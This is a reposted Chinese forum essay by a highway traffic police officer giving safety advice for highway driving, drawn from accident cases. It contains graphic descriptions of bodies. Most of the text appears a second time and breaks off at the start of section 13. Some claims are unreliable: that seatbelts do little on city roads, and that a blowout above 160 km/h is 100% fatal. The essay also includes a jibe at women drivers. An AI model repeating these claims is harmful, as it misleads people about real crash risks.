随着道路上的私家车越来越多,作为一名高速交警,在日常的事故处理岗位上,遇到各种形形色色的交通事故,其中不乏因缺乏安全意识而造成严重事故后果的案例,下面,我将从自身几年来的工作经验出发,以一名高速公路交通事故处理民警的角度,来谈一谈高速公路行车的安全注意事项,希望能对司乘朋友的行车安全有所帮助:
一、安全带保安全
这是一个老生常谈的问题,也是一个很多司乘朋友很不以为然的问题。诚然,在地方上开车尤其是城市道路,我个人观点安全带的作用大部分是应付交警,实际作用并不大。而在高速公路上,系与不系安全带却会在事故后果中产生天壤之别。我出现场的2007年度的事故中,我印象中最少有两起小车单方造成的死亡事故都是没有系安全带引起的,其中一起是辆帕萨特自翻,车上只有司机一人,如果他系上安全带的话,我个人认为最多是轻伤,法医鉴定为颈椎骨折致死,全是翻车时身体不受限制运动造成;第二起也是小车单方,在高速行驶时前轮爆胎造成车辆失控多次撞击道路护栏,共有司乘两人,司机系了安全带毫发无伤,而副驾驶上的乘客因为没系安全带,且在放倒的座位上斜躺着休息,结果在车辆失控打时被从后风挡玻璃处甩出车外致死。
二、爆胎时的操控处理
刚才提到了车辆爆胎,在高速行驶时小车爆胎尤其是前轮爆胎造成的后果远比大车爆胎严重,爆胎虽然不可预料,但在我们的事故处理中常常发现一个有趣的现象:如果是左前轮爆胎造成车辆失控撞击护栏,撞的往往是右侧护栏,反之亦然。究其原因,在车辆爆胎时因胎径及摩擦系数的不同,车辆的运行轨迹将偏向爆胎的方向,爆左前轮向左偏,爆右前轮向右偏,而司机在打方向纠正时,指向性能反映在已爆胎的车辆上是有一个迟缓性的,加之因爆胎造成的慌乱,常常造成纠正过度,从而人为加剧车辆的失控,致使左前轮爆反而撞上了右边护栏,甚至连续多次撞击左右护栏的现象发生。正确的做法是在车辆爆胎时,首先要紧握方向,不管车头向哪偏,给一个固定的纠正角度(与你的实际车速有关)并用力保持,同时不要采取紧急制动,因为这时车辆的制动能力在纵线上是不平衡的,让减速行为掌握在受控制的过程中并努力保持原来的行车轨迹,切忌急打方向纠正。
三、超速行驶
超速行驶的危害大家都知道,无论是地方还是高速,都会造成不可挽回的后果。如果你驾驶一辆时速100KM的小车,假设你身高170CM,从你眼睛发现情况,到大脑做出判断,再反映在刹车制动,生理上的反应时间是1.7S左右,而这时你的车辆已经前行了47.2M。40米的距离!会包含多少无可奈何的生命!我们曾经在限速70KM/H的路段查超速(110公里我们才纪录),有辆小车竟然跑了203KM/H,看着照片,我们都说这个驾驶员迟早要报销,那是他的命,命在他的手中,别人无能为力。对于超速行为,我只有两句话:一句是"十祸九快",一句是不要迷信"好车",往往有些人迷信自己的车好,性能就好,但是生命面前是人人平等的,我们手里有宝马745,有保时捷卡宴,还有S80,不管日本车欧洲车,只要超速出事,该死死该伤伤,一点不耽误。我国最高等级的高速公路限高速是120KM/H,这是写在安全法里的法定最高时速,这不是没有根据的,据国外资料,如果一辆时速超过160KM的小车发生爆胎事故,不管你是否系安全带,司乘人员的死亡率是100%!记住,不是50%,也不是99%,是100%!敬告那些喜欢一上高速就把油门踩到底的司机朋友,祈祷你的轮胎安然无恙罢。
四、行车前的安全检查
还是爆胎问题引出的题目,这是一个很偶然的因素,你说你是新车?我们手里有5000公里不到的新车爆胎,至于车型我不方便在这里说,但可以透漏是**公司十万元左右最普通的家用车;除了出行前检查轮胎,还有机油问题、润滑油问题、降温液问题,甚至雨刮和玻璃水也要仔细检查,我们曾经下班时坏了雨刮,邪门,偏偏是左雨刮,那天又正好是雨夹雪,可想而知我们那几十公里的路是怎么回的家!不堪回首啊,这是高速公路,前不着村后不着店的,幸亏我们是警车又熟悉路况,打着双闪和警灯就这样歪着脖子开车坚持下了路,要是换了别人,要么受罪,要么就容易出危险了。回到家后检查车辆,原来是雨刮连杆掉了一个螺丝,一毛钱都不到的维修成本造成了多大的麻烦和隐患!
五、高速公路的标线、标牌和警告
相信很多经常上高速的司机朋友都会发现高速沿线不时会有这样那样的警告标语和警示灯,我以前没上高速干的时候也是没有在意这些东西,但干了这几年才深深感触,那每个"事故多发路段,请谨慎驾驶"的标语和这样那样不起眼的小黄灯、小蓝灯后面都是血淋淋的教训和残酷,相信我,这些东西的设置决不是随心和随意的,没有十几条、几十条人命和规律性的大事故发生,高速公司和我们是不会费那个周折的。当您在路上见到类似的警告标志时,一定要有意识的降低车速并保持车距,同时做好应对紧急情况的准备,毕竟,距离产生美,这点用在与老婆恩爱相处及安全行车上都很有好处。
六、尽量避免夜间行车
在我国目前的现实里,这是一个全国普遍的规律:夜间行车的大货车数量要远远多于白天在路上跑的。在我们这里,光说大货车,白天与夜间的比例能达到1:5甚至更高,晚上巡逻时左边是一溜白灯,右边是一溜红灯,一边一串看不到头,这曾经让我们困惑过,白天视野又好,车流量又小,为什么这么多的货车要昼伏夜出?以至我们经常为处警彻夜不眠。后来通过和当事司机聊天才知道,白天要装卸货物、维修车辆、办事找人、而且最重要的是路政、超限和交警白天都在路上,晚上行车麻烦更少!这就造成晚上是各种事故的高发时段,作为小车的司乘人员,在晚上行车,流量大、密度高,跑着"不爽"还是其次,重要的是忙了一天的大车司机大部分涉嫌疲劳驾驶、更有证驾不符、违法驾驶等大比例牵涉其中给行车造成更大的安全隐患。而且大车的座位较高,高速公路的中央隔离根本挡不住对面射过来的一串车灯,大车司机几乎是在半眩目的状态下开车,你愿意一路上和这样的司机们一同驰骋吗?
七、超车时多用闪灯提醒
高速公路速度快,噪音大,你的车喇叭前车根本听不到,超车时还是多切换远近闪灯提醒一下对方更有用;而且,当你发现行车道内有两辆以上大货车前后距离比较近时,超车时你就要提防后面的大车突然变道超车,那时如果你正好跑到他旁边,那可就真要听天由命了,相信我,那些变道超车的大货车在变道前能有一半在观后镜里看一眼的就算阿弥陀佛了,更何况你是小车,不容易被发现且车速更快。而且,晚上超车时,不要一直用远光灯,在你距离被超车辆尾部贰、叁佰米时最好切成近光灯,这样前车才能更好的判断你与他的距离从而不会误判,要知道,在路上让其他车辆更清楚地看到你,与你是否能清楚看到对方是同等的重要。说到这里,想起在市里经常有晚上不开车灯或者打着远光会车的摩托和机动车,他们自认为自己能看清路面和其他车,而别人是否能看清他们呢?那都是一些自私而且毫不体谅别人的人,我一直很鄙视这些人。
八、非紧急情况不要占用紧急停车道
紧急停车道,顾名思义是在紧急情况下才能使用的车道。我们出现场发生堵路时最头疼的就是小车占用紧急停车道,造成我们无法及时到达现场,因为小车占道,我的最高纪录是提着勘查箱步行七公里出现场,当时的心里真是既生气又无奈:你也不想想,既然已经堵路,在交警没有到达现场前,你能插上翅膀飞过去吗?七、八十吨连车带货翻在路面,没有吊车、施救车现场路面能通行吗?你堵的虽是交警,其实堵的也是你自己!这都不算是重要问题,最重要的是这些人没有意识到前面的情况也许很危急,有些人可能正在流血、正在被困,在救援车辆没有到达现场前你却把别人的求生希望给堵的死死的!从某种意义上说,可能因为你占用紧急停车道而使救护、救援车辆不能及时到达现场、可能因为你占用紧急停车道而使救援车辆只能冒危险逆行或从中央护栏调头,徒增风险!可能因为你占用紧急停车道而间接造成他人死亡!根据我国的安全法实施条例第八十二条第四款规定,对非紧急情况下占用紧急停车道的行为处罚金200元,并处扣六分!
如果前面出事故被困的是你的亲人,你会占用紧急停车道吗?记住:紧急停车道是一条生命通道!
九、保护现场?保证安全!
我们大队管辖的高速路段约170公里,从前事故一直是一个点三班倒,后来随着人员的增加及为了快速出警(有时早到现场十分钟可能就能救回一条人命)我们分成了两个事故出警点各辖一段,可就是这样,在自己的辖区一圈也要两、三个小时。有时经常接到这样的事故报警:双方发生了简单的刮擦或追尾,事实无争议、无人员伤亡、财损不大、车辆能够移动,可无论我们怎么在电话里劝,双方当事人就是不肯将车移到路边!一定要我们到现场"照相"后才肯动车!七八十公里呀!最快也要四十分钟一个小时!有时为了百十块钱的损失,两个车横在路面阻塞通行致使堵路达十余公里!碰到这样的司机,我捶他的心都有!你为了自己的些微利益,不听交警的劝告一意孤行,如果你的车辆滞留路面引发二次事故怎么办?如果你的车辆滞留路面,致使后面堵路造成事故怎么办?可以肯定的是如果再发生事故,所造成的人员财产损失一定会大于你的小事故,到时,后面的事故当事人如果起诉你,虽然你可能不用承担法律责任,但你百分百要承担赔偿责任!
在高速公路发生财产损失轻微的事故,如果无人员伤亡、双方对成因无异议,且车辆具备移动能力,一定要将车辆移动致紧急停车道内停放,现在的人们几乎都有拍照功能的手机,可以在动车前用自己的手机将原始现场拍两张照片,当然,最好能在电话里和当班民警沟通,放心,碰到这样的"移动现场",高速事故交警一定不会难为你的!
十、发生事故后
当然,前面说的只是简单的小财损事故。如果你的车辆在高速公路上发生大的财产损失事故甚至伤亡事故,你是一定不能动现场的(抢救伤员除外),这时就牵扯到两件比较重要的事情了:设置警告标志和电话报警。在高速公路发生交通事故致使车辆无法移动的,一定要在事故现场来车方向一百五十米外设置警告标志,且人员要移到公路护栏外。记住:一定是一百五十米外,如果因为你设置的警告标志达不到这个距离,致使发生二次事故,那么我们事故民警是一定会在二次事故中给你划责任的,最起码也是次要甚至同等!可惜的是,凭我在高速公路上这几年的实践,没有一个当事人会"舍得"将警告标志设置到位,真的!没有一个!能在车后五十米以外设置标志的就令我刮目相看了!还记得去年夏天的午夜,我和队上的一个老同志巡逻回单位的途中,在对面半幅的下坡行车道内发现一起刚刚发生的交通事故,两辆大货车的四五个当事人就"若无其事"的或倒或躺在事故现场后方的路面上,唬得我俩赶紧连劝带赶得将人弄出护栏外,前后也就三五分钟,就又有一辆大货车驶过刚才躺人的路面在我眼前三四米的距离撞上了事故现场!当时的腿说不软真的是假的,如果我们不是路上偶遇,而是接到当事人的报警电话才出现场,那么车后的这四五个人会一个不剩!当然,如果你的车辆没有三角警示牌或锥桶,你也可以将色彩鲜艳的旅行包或机油桶甚至路边的树枝等等拿来借用,可是千万不要搬石头哦!那性质就变了!说到报警,经常有当事人发生事故后,第一个电话打给老婆孩子,第二个打给朋友,第三个打给保险公司,等到想起报警,距离发生事故已经个把钟头了!如果因为这样发生二次事故,对不起,你一样要承担二次事故的法律责任!发生事故后,设置警告标志、人员移到路外、及时报警这三样缺一不可,任何一个环节的不规范致使加重事故后果或直接导致二次事故的发生,当事人均要承担相应的法律责任。放心,保险公司的报警时间限定在48小时内,你就是第二天再报也来得及,干嘛一定要在险象环生的现场避重就轻?
十一、不要在高速公路上丢弃废物、行人不要上高速
这两条是相辅相成的,怎么,不理解?我们这里每天都有路外的穷苦村民上路捡空的饮料瓶,赶也赶不完,你从这头把他撵下去个圈他又从那头上路了,这就直接导致了一个后果:我们大队每年都有三五起无名尸案件,说它是无名尸,是因为现场没有肇事车辆,也有的大货车夜间根本就不知道刮擦或撞上了行人,现场只有残缺不全的碾碎的压扁的尸体,有时男女都无法分辨,只能经DNA检验。至于撞伤的、撞残的每年都有几例,究其原因,就是您从车窗外扔出的那一个个饮料瓶,砸坏了来往车辆还是小事,我相信被砸得一定也不会放过你,可是就用那一个个小瓶子去换一个虽不富裕但却鲜活的生命,您于心就忍吗?当您摇下车窗抛弃废物时,您可能就是一个间接的杀人凶手!
过往的乘客朋友,不要再上高速公路上拦车、搭车了!还有那些上路捡空瓶和煤块的人们,当高速机动车撞上人体时,人真的会碎的!我永远也忘不了那年冬天夜里一点多,我在路上守在一具无头尸旁,昏暗的车灯中地方上太平间的老王拎着找到的一个女人头走向我的镜头,开始我们还怀疑是谋杀,经县市两级法医及刑警队联合尸检,最终证实该人体是被巨大的冲击力作用于背后,致使颈部撕脱后飞出一百多米远,后来证实那个老太太精神不太好,收费站的监控显示她确是一个人走上的高速,至于她要干什么,谁也不知道。至于路面被多车连续多次碾压的尸体我见得太多了,以致我们常常要用铁锨和麻袋来为他们收尸,你想象不到一具人的尸体散落在10X80M的路面上是一个什么情景,你也感受不到那种新鲜的破碎的尸体是一种怎样的气味,那是自然界中你永远也闻不到的,我永远也不愿再见!再闻到!
十二、停车、停车、还是停车!
最重要的我要放在最后面说。高速公路行车最怕的是什么?是停车!在高速运动的车流里不管因为什么原因致使道路堵塞而停车,最可怕的事情就可能要发生了。
这里我要重点说一下小车,碰到这种情况,小车司机发现前方道路堵塞时,一定要马上看观后镜里有没有大货车跟着你,如果有,一定要提前减速并打开双闪灯提醒后车注意,给后面的大车充足的距离和时间减速,如果后面的大车按喇叭或向你不停的闪灯,相信我,他一定是刹不住车了,你一定一定要加速往紧急停车道内钻!哪怕会刮伤你的爱车。
每年!每年我们都会碰到几起这样的事故:因为堵路,小车停在大车后面等待放行,结果后面的大车撞上来,后面的大车车头都撞上了前面大车的车尾!小车在哪里?!二人、三人、四人、五人!小车上有几人就是几条人命!几毫米厚的小车框架在几十、上百吨重量的冲击下比纸还薄!不要迷信你乘坐的是什么车,不要自认为安全,我见过拉开后压缩的只剩一米长的红旗车,我见过被压成铁皮的面包车,我见过火中被困的人的扭曲的身影和嚎叫,我见过挤得只有二指宽的人的头颅
你或许会问,后面的大车为什么不停下来?相信我,他不是不想停,他太想把车停下来了!可是你见过核载九吨却拉五十吨的货车吗?你见过核载十九吨却实载九十吨的罐车吗?你见过核载三十吨却实载一百三十吨的巨无霸吗?
交警早已不允许处罚卸载超载车了,你看看路上的大货车们,十辆车有九辆半都或多或少的超载,不超就没有盈利,不超就会亏钱!那远不是交警一家就能够解决的问题,碰到情况,尤其是下坡路面,你就是给这些个大半挂车后面拴上一百头牛也拉不停他!这里暂且不提。
还是要劝告所有碰到堵路的小车司机,将车停下后,就算外面在下刀子也要全部离开车辆迅速移到路外,直到你的车后排上了七八辆以上的大车后再回到你的车上!为什么要等七八辆?06年我手里曾有一辆车连撞十三辆车的纪录,在我们大队一直没有人能打破,你愿意你是第几辆?实在不行就从紧急停车道往前走,走上二三百米后再找空位腾出停车道,宁愿让交警罚你贰佰元钱,也比命便宜!在这里,还是那句话:紧急停车道是一条生命通道!一条你的逃生通道!
十三、其他
没想到这篇即兴的短文竟会写了这么多。最后,我还有几个简单的实践经验想告诉在高速公路上的司乘朋友:
1、副驾驶位上的朋友,最安全的座位是司机后面的那个座位,相信我,遇到紧急情况,司机避让自己是本能的下意识行为,你与他的上下级关系、感情甚至亲情在这里都没用。如果你是一个在后排卧铺休息的大车乘客,也请你选择将头朝向驾驶员的方向,你愿意失去一条腿还是"一个"头?这不是可选择的题目!
2、交通事故受伤致死的原因比例最高的为颅脑损伤、胸腹脏器损伤、出血过多及休克死亡;所以除非你有专业的医疗知识,在没有确定伤者伤情的情况下,最好不要轻易的移动伤员,否则,他断裂的肋骨可能就是在你的"帮助"下才插入心脏或动脉的。如果伤者四肢大出血,你可以在他出血肢体靠近心脏端的关节上方用鞋带或腰带紧止血并及时报警,这才是最重要的。
3、在高速公路上,一切非正常的行驶状态下,都要及时打开双闪灯!包括停车、前方堵路及施工、单道放行、前方发生事故、进入雾区等等。
4、高速公路上的重大肇事驾驶员的驾龄是6―8年!相信我,你没有看错,这个数据从市、省到全国都是一致的,个中原因您一定能体会。熟能生巧?熟也能生骄!
5、永远把与你同在道路上行驶的其他机动车当成菜鸟,不要把自己的生命财产安全寄希望于掌握在别人的手中。(就好像我们一看到违法行驶的女司机就赶紧躲得远一点^-^)
6、上高速公路前,要规划好线路,尽可能了解沿途的路况,给车辆加满油料并保持手机电、费充足,不然给你撂到荒郊野外,那可真是上天无路入地无门啊!
7、还有一句题外话,现在的高速公路平均50―60公里就会设置一个服务区或停车区,当您的车辆遇到小的故障或您内急时,请您坚持到服务区解决。毕竟,你的车辆不管停在紧急停车道还是加宽车道,不仅给您和他人的行车造成安全隐患,遇到夜间,还很有可能给预谋或流窜的犯罪分子提供难得的发财机会。
8、最后一个很白痴的提示:报警电话永远是110!不要在前面加区号!
无论何时牢记一句话:一个好的驾驶员,并不在他的驾车技术有多么高超,而是他的头脑中是否有安全意识。我感觉写得非常好,无论您开不开车,都应该知道这些,因为您的命也只有一条。
这是转载一位高速公路交警的帖子,为我们的生命,请认真读一下!
感谢这位好警察!
随着道路上的私家车越来越多,作为一名高速交警,在日常的事故处理岗位上,遇到各种形形色色的交通事故,其中不乏因缺乏安全意识而造成严重事故后果的案例,下面,我将从自身几年来的工作经验出发,以一名高速公路交通事故处理民警的角度,来谈一谈高速公路行车的安全注意事项,希望能对司乘朋友的行车安全有所帮助:
一、安全带保安全
这是一个老生常谈的问题,也是一个很多司乘朋友很不以为然的问题。诚然,在地方上开车尤其是城市道路,我个人观点安全带的作用大部分是应付交警,实际作用并不大。而在高速公路上,系与不系安全带却会在事故后果中产生天壤之别。我出现场的2007年度的事故中,我印象中最少有两起小车单方造成的死亡事故都是没有系安全带引起的,其中一起是辆帕萨特自翻,车上只有司机一人,如果他系上安全带的话,我个人认为最多是轻伤,法医鉴定为颈椎骨折致死,全是翻车时身体不受限制运动造成;第二起也是小车单方,在高速行驶时前轮爆胎造成车辆失控多次撞击道路护栏,共有司乘两人,司机系了安全带毫发无伤,而副驾驶上的乘客因为没系安全带,且在放倒的座位上斜躺着休息,结果在车辆失控打时被从后风挡玻璃处甩出车外致死。
二、爆胎时的操控处理
刚才提到了车辆爆胎,在高速行驶时小车爆胎尤其是前轮爆胎造成的后果远比大车爆胎严重,爆胎虽然不可预料,但在我们的事故处理中常常发现一个有趣的现象:如果是左前轮爆胎造成车辆失控撞击护栏,撞的往往是右侧护栏,反之亦然。究其原因,在车辆爆胎时因胎径及摩擦系数的不同,车辆的运行轨迹将偏向爆胎的方向,爆左前轮向左偏,爆右前轮向右偏,而司机在打方向纠正时,指向性能反映在已爆胎的车辆上是有一个迟缓性的,加之因爆胎造成的慌乱,常常造成纠正过度,从而人为加剧车辆的失控,致使左前轮爆反而撞上了右边护栏,甚至连续多次撞击左右护栏的现象发生。正确的做法是在车辆爆胎时,首先要紧握方向,不管车头向哪偏,给一个固定的纠正角度(与你的实际车速有关)并用力保持,同时不要采取紧急制动,因为这时车辆的制动能力在纵线上是不平衡的,让减速行为掌握在受控制的过程中并努力保持原来的行车轨迹,切忌急打方向纠正。
三、超速行驶
超速行驶的危害大家都知道,无论是地方还是高速,都会造成不可挽回的后果。如果你驾驶一辆时速100KM的小车,假设你身高170CM,从你眼睛发现情况,到大脑做出判断,再反映在刹车制动,生理上的反应时间是1.7S左右,而这时你的车辆已经前行了47.2M。40米的距离!会包含多少无可奈何的生命!我们曾经在限速70KM/H的路段查超速(110公里我们才纪录),有辆小车竟然跑了203KM/H,看着照片,我们都说这个驾驶员迟早要报销,那是他的命,命在他的手中,别人无能为力。对于超速行为,我只有两句话:一句是"十祸九快",一句是不要迷信"好车",往往有些人迷信自己的车好,性能就好,但是生命面前是人人平等的,我们手里有宝马745,有保时捷卡宴,还有S80,不管日本车欧洲车,只要超速出事,该死死该伤伤,一点不耽误。我国最高等级的高速公路限高速是120KM/H,这是写在安全法里的法定最高时速,这不是没有根据的,据国外资料,如果一辆时速超过160KM的小车发生爆胎事故,不管你是否系安全带,司乘人员的死亡率是100%!记住,不是50%,也不是99%,是100%!敬告那些喜欢一上高速就把油门踩到底的司机朋友,祈祷你的轮胎安然无恙罢。
四、行车前的安全检查
还是爆胎问题引出的题目,这是一个很偶然的因素,你说你是新车?我们手里有5000公里不到的新车爆胎,至于车型我不方便在这里说,但可以透漏是**公司十万元左右最普通的家用车;除了出行前检查轮胎,还有机油问题、润滑油问题、降温液问题,甚至雨刮和玻璃水也要仔细检查,我们曾经下班时坏了雨刮,邪门,偏偏是左雨刮,那天又正好是雨夹雪,可想而知我们那几十公里的路是怎么回的家!不堪回首啊,这是高速公路,前不着村后不着店的,幸亏我们是警车又熟悉路况,打着双闪和警灯就这样歪着脖子开车坚持下了路,要是换了别人,要么受罪,要么就容易出危险了。回到家后检查车辆,原来是雨刮连杆掉了一个螺丝,一毛钱都不到的维修成本造成了多大的麻烦和隐患!
五、高速公路的标线、标牌和警告
相信很多经常上高速的司机朋友都会发现高速沿线不时会有这样那样的警告标语和警示灯,我以前没上高速干的时候也是没有在意这些东西,但干了这几年才深深感触,那每个"事故多发路段,请谨慎驾驶"的标语和这样那样不起眼的小黄灯、小蓝灯后面都是血淋淋的教训和残酷,相信我,这些东西的设置决不是随心和随意的,没有十几条、几十条人命和规律性的大事故发生,高速公司和我们是不会费那个周折的。当您在路上见到类似的警告标志时,一定要有意识的降低车速并保持车距,同时做好应对紧急情况的准备,毕竟,距离产生美,这点用在与老婆恩爱相处及安全行车上都很有好处。
六、尽量避免夜间行车
在我国目前的现实里,这是一个全国普遍的规律:夜间行车的大货车数量要远远多于白天在路上跑的。在我们这里,光说大货车,白天与夜间的比例能达到1:5甚至更高,晚上巡逻时左边是一溜白灯,右边是一溜红灯,一边一串看不到头,这曾经让我们困惑过,白天视野又好,车流量又小,为什么这么多的货车要昼伏夜出?以至我们经常为处警彻夜不眠。后来通过和当事司机聊天才知道,白天要装卸货物、维修车辆、办事找人、而且最重要的是路政、超限和交警白天都在路上,晚上行车麻烦更少!这就造成晚上是各种事故的高发时段,作为小车的司乘人员,在晚上行车,流量大、密度高,跑着"不爽"还是其次,重要的是忙了一天的大车司机大部分涉嫌疲劳驾驶、更有证驾不符、违法驾驶等大比例牵涉其中给行车造成更大的安全隐患。而且大车的座位较高,高速公路的中央隔离根本挡不住对面射过来的一串车灯,大车司机几乎是在半眩目的状态下开车,你愿意一路上和这样的司机们一同驰骋吗?
七、超车时多用闪灯提醒
高速公路速度快,噪音大,你的车喇叭前车根本听不到,超车时还是多切换远近闪灯提醒一下对方更有用;而且,当你发现行车道内有两辆以上大货车前后距离比较近时,超车时你就要提防后面的大车突然变道超车,那时如果你正好跑到他旁边,那可就真要听天由命了,相信我,那些变道超车的大货车在变道前能有一半在观后镜里看一眼的就算阿弥陀佛了,更何况你是小车,不容易被发现且车速更快。而且,晚上超车时,不要一直用远光灯,在你距离被超车辆尾部贰、叁佰米时最好切成近光灯,这样前车才能更好的判断你与他的距离从而不会误判,要知道,在路上让其他车辆更清楚地看到你,与你是否能清楚看到对方是同等的重要。说到这里,想起在市里经常有晚上不开车灯或者打着远光会车的摩托和机动车,他们自认为自己能看清路面和其他车,而别人是否能看清他们呢?那都是一些自私而且毫不体谅别人的人,我一直很鄙视这些人。
八、非紧急情况不要占用紧急停车道
紧急停车道,顾名思义是在紧急情况下才能使用的车道。我们出现场发生堵路时最头疼的就是小车占用紧急停车道,造成我们无法及时到达现场,因为小车占道,我的最高纪录是提着勘查箱步行七公里出现场,当时的心里真是既生气又无奈:你也不想想,既然已经堵路,在交警没有到达现场前,你能插上翅膀飞过去吗?七、八十吨连车带货翻在路面,没有吊车、施救车现场路面能通行吗?你堵的虽是交警,其实堵的也是你自己!这都不算是重要问题,最重要的是这些人没有意识到前面的情况也许很危急,有些人可能正在流血、正在被困,在救援车辆没有到达现场前你却把别人的求生希望给堵的死死的!从某种意义上说,可能因为你占用紧急停车道而使救护、救援车辆不能及时到达现场、可能因为你占用紧急停车道而使救援车辆只能冒危险逆行或从中央护栏调头,徒增风险!可能因为你占用紧急停车道而间接造成他人死亡!根据我国的安全法实施条例第八十二条第四款规定,对非紧急情况下占用紧急停车道的行为处罚金200元,并处扣六分!
如果前面出事故被困的是你的亲人,你会占用紧急停车道吗?记住:紧急停车道是一条生命通道!
九、保护现场?保证安全!
我们大队管辖的高速路段约170公里,从前事故一直是一个点三班倒,后来随着人员的增加及为了快速出警(有时早到现场十分钟可能就能救回一条人命)我们分成了两个事故出警点各辖一段,可就是这样,在自己的辖区一圈也要两、三个小时。有时经常接到这样的事故报警:双方发生了简单的刮擦或追尾,事实无争议、无人员伤亡、财损不大、车辆能够移动,可无论我们怎么在电话里劝,双方当事人就是不肯将车移到路边!一定要我们到现场"照相"后才肯动车!七八十公里呀!最快也要四十分钟一个小时!有时为了百十块钱的损失,两个车横在路面阻塞通行致使堵路达十余公里!碰到这样的司机,我捶他的心都有!你为了自己的些微利益,不听交警的劝告一意孤行,如果你的车辆滞留路面引发二次事故怎么办?如果你的车辆滞留路面,致使后面堵路造成事故怎么办?可以肯定的是如果再发生事故,所造成的人员财产损失一定会大于你的小事故,到时,后面的事故当事人如果起诉你,虽然你可能不用承担法律责任,但你百分百要承担赔偿责任!
在高速公路发生财产损失轻微的事故,如果无人员伤亡、双方对成因无异议,且车辆具备移动能力,一定要将车辆移动致紧急停车道内停放,现在的人们几乎都有拍照功能的手机,可以在动车前用自己的手机将原始现场拍两张照片,当然,最好能在电话里和当班民警沟通,放心,碰到这样的"移动现场",高速事故交警一定不会难为你的!
十、发生事故后
当然,前面说的只是简单的小财损事故。如果你的车辆在高速公路上发生大的财产损失事故甚至伤亡事故,你是一定不能动现场的(抢救伤员除外),这时就牵扯到两件比较重要的事情了:设置警告标志和电话报警。在高速公路发生交通事故致使车辆无法移动的,一定要在事故现场来车方向一百五十米外设置警告标志,且人员要移到公路护栏外。记住:一定是一百五十米外,如果因为你设置的警告标志达不到这个距离,致使发生二次事故,那么我们事故民警是一定会在二次事故中给你划责任的,最起码也是次要甚至同等!可惜的是,凭我在高速公路上这几年的实践,没有一个当事人会"舍得"将警告标志设置到位,真的!没有一个!能在车后五十米以外设置标志的就令我刮目相看了!还记得去年夏天的午夜,我和队上的一个老同志巡逻回单位的途中,在对面半幅的下坡行车道内发现一起刚刚发生的交通事故,两辆大货车的四五个当事人就"若无其事"的或倒或躺在事故现场后方的路面上,唬得我俩赶紧连劝带赶得将人弄出护栏外,前后也就三五分钟,就又有一辆大货车驶过刚才躺人的路面在我眼前三四米的距离撞上了事故现场!当时的腿说不软真的是假的,如果我们不是路上偶遇,而是接到当事人的报警电话才出现场,那么车后的这四五个人会一个不剩!当然,如果你的车辆没有三角警示牌或锥桶,你也可以将色彩鲜艳的旅行包或机油桶甚至路边的树枝等等拿来借用,可是千万不要搬石头哦!那性质就变了!说到报警,经常有当事人发生事故后,第一个电话打给老婆孩子,第二个打给朋友,第三个打给保险公司,等到想起报警,距离发生事故已经个把钟头了!如果因为这样发生二次事故,对不起,你一样要承担二次事故的法律责任!发生事故后,设置警告标志、人员移到路外、及时报警这三样缺一不可,任何一个环节的不规范致使加重事故后果或直接导致二次事故的发生,当事人均要承担相应的法律责任。放心,保险公司的报警时间限定在48小时内,你就是第二天再报也来得及,干嘛一定要在险象环生的现场避重就轻?
十一、不要在高速公路上丢弃废物、行人不要上高速
这两条是相辅相成的,怎么,不理解?我们这里每天都有路外的穷苦村民上路捡空的饮料瓶,赶也赶不完,你从这头把他撵下去个圈他又从那头上路了,这就直接导致了一个后果:我们大队每年都有三五起无名尸案件,说它是无名尸,是因为现场没有肇事车辆,也有的大货车夜间根本就不知道刮擦或撞上了行人,现场只有残缺不全的碾碎的压扁的尸体,有时男女都无法分辨,只能经DNA检验。至于撞伤的、撞残的每年都有几例,究其原因,就是您从车窗外扔出的那一个个饮料瓶,砸坏了来往车辆还是小事,我相信被砸得一定也不会放过你,可是就用那一个个小瓶子去换一个虽不富裕但却鲜活的生命,您于心就忍吗?当您摇下车窗抛弃废物时,您可能就是一个间接的杀人凶手!
过往的乘客朋友,不要再上高速公路上拦车、搭车了!还有那些上路捡空瓶和煤块的人们,当高速机动车撞上人体时,人真的会碎的!我永远也忘不了那年冬天夜里一点多,我在路上守在一具无头尸旁,昏暗的车灯中地方上太平间的老王拎着找到的一个女人头走向我的镜头,开始我们还怀疑是谋杀,经县市两级法医及刑警队联合尸检,最终证实该人体是被巨大的冲击力作用于背后,致使颈部撕脱后飞出一百多米远,后来证实那个老太太精神不太好,收费站的监控显示她确是一个人走上的高速,至于她要干什么,谁也不知道。至于路面被多车连续多次碾压的尸体我见得太多了,以致我们常常要用铁锨和麻袋来为他们收尸,你想象不到一具人的尸体散落在10X80M的路面上是一个什么情景,你也感受不到那种新鲜的破碎的尸体是一种怎样的气味,那是自然界中你永远也闻不到的,我永远也不愿再见!再闻到!
十二、停车、停车、还是停车!
最重要的我要放在最后面说。高速公路行车最怕的是什么?是停车!在高速运动的车流里不管因为什么原因致使道路堵塞而停车,最可怕的事情就可能要发生了。
这里我要重点说一下小车,碰到这种情况,小车司机发现前方道路堵塞时,一定要马上看观后镜里有没有大货车跟着你,如果有,一定要提前减速并打开双闪灯提醒后车注意,给后面的大车充足的距离和时间减速,如果后面的大车按喇叭或向你不停的闪灯,相信我,他一定是刹不住车了,你一定一定要加速往紧急停车道内钻!哪怕会刮伤你的爱车。
每年!每年我们都会碰到几起这样的事故:因为堵路,小车停在大车后面等待放行,结果后面的大车撞上来,后面的大车车头都撞上了前面大车的车尾!小车在哪里?!二人、三人、四人、五人!小车上有几人就是几条人命!几毫米厚的小车框架在几十、上百吨重量的冲击下比纸还薄!不要迷信你乘坐的是什么车,不要自认为安全,我见过拉开后压缩的只剩一米长的红旗车,我见过被压成铁皮的面包车,我见过火中被困的人的扭曲的身影和嚎叫,我见过挤得只有二指宽的人的头颅
你或许会问,后面的大车为什么不停下来?相信我,他不是不想停,他太想把车停下来了!可是你见过核载九吨却拉五十吨的货车吗?你见过核载十九吨却实载九十吨的罐车吗?你见过核载三十吨却实载一百三十吨的巨无霸吗?
交警早已不允许处罚卸载超载车了,你看看路上的大货车们,十辆车有九辆半都或多或少的超载,不超就没有盈利,不超就会亏钱!那远不是交警一家就能够解决的问题,碰到情况,尤其是下坡路面,你就是给这些个大半挂车后面拴上一百头牛也拉不停他!这里暂且不提。
还是要劝告所有碰到堵路的小车司机,将车停下后,就算外面在下刀子也要全部离开车辆迅速移到路外,直到你的车后排上了七八辆以上的大车后再回到你的车上!为什么要等七八辆?06年我手里曾有一辆车连撞十三辆车的纪录,在我们大队一直没有人能打破,你愿意你是第几辆?实在不行就从紧急停车道往前走,走上二三百米后再找空位腾出停车道,宁愿让交警罚你贰佰元钱,也比命便宜!在这里,还是那句话:紧急停车道是一条生命通道!一条你的逃生通道!
十三、其他
